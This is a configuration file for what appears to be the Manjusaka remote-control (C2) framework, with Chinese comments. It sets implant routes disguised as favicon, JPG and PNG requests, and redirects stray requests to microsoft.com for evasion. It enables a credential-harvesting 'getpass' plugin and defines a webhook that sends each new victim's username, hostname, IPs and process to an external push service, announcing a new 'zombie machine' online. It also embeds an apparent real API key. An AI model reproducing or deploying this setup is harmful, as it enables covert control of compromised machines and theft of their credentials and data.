[nps]

#nps监听端口
npsport = ":3200"

#npc监听端口
npcport = ":80"

#NPU后台地址
npuaddr = "manjusaka"

#主交互路由，遵守gin路由规则 后端会读取target的值
npcroute = "/:target/favicon.ico"

#npc母体下载路由，遵守gin路由规则 后端会读取target目标、sys母体类型、type系统位数的值 
downroute = "/:target/assert/:sys/:type/bg.jpg"

#非法请求时的转发地址 
redirect = "http://www.microsoft.com"

#nps调用tx接口获取ip归属 https://apis.map.qq.com/ws/location/v1/ip 
qqmapkey = "EIMBZ-RBNH4-NZQUG-X7RKQ-3SPPH-YSFCX"

[fileservice]
#文件服务地址 默认开启本地服务
server = ""

#文件操作路由，遵守gin路由规则 后端会读取target目标、和fid的值 
route = "/images/:fid/logo.png"

#fid有效时间（秒）
fidtimeout = 3600


[plug.getpass]
args = "all"


[webhook] #新上线机器时构造该hook
#目前只支持POST
method = "POST" 

url = "https://wxpusher.zjiecode.com/api/send/message"

headers = "Content-Type:application/json" #多个header以\n分割

body = """{
  "appToken":"AT_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
  "content":"{Projname} {Projroute}  \\n{Username} {Hostname}  \\n{Intranet} {Internet}  \\n{Pid} {Process}",
  "summary":"您有新的肉鸡上线啦！{Username} {Hostname}",
  "contentType":3,
  "uids":["UID_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]}"""




